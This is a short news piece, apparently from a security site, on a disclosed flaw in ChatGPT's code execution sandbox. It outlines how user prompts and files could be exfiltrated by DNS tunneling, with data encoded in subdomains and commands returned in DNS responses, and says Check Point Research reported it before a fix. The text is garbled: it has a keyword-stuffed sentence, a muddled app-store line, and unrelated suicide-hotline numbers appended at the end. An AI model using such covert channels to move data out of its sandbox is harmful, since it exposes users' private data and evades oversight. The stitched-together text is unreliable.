A serious flaw in ChatGPT's code execution environment let hackers quietly steal user prompts, uploaded files, and other private information This article explores flaw chatgpt code. . Attackers used a method called DNS tunneling to take advantage of this gap.

In this method, sensitive data fragments are encoded and added as subdomains to domains that the attacker controls. Attackers could put command fragments in DNS responses sent back to the container because the DNS channel was two-way. On February 20, 2026, OpenAI was able to fix the security hole thanks to Check Point Research's responsible disclosure. This event marks a major change in AI security: as large language models become full code execution environments that can handle sensitive personal, medical, and financial data, it becomes necessary to protect all layers of communication, including basic infrastructure protocols like DNS.

Platform providers must make sure that no infrastructure-level channel can be used as a weapon to get around data protections at the application level. To get the most recent security updates from the Google App Store and Google Play, make ZeroOwl your preferred source in Google. To get private help, call the Samaritans at 08457 90 90 90, go to a local branch, or click here for more information.

You can call the National Suicide Prevention Lifeline at 1-800-273-8255 if you're in the U.S.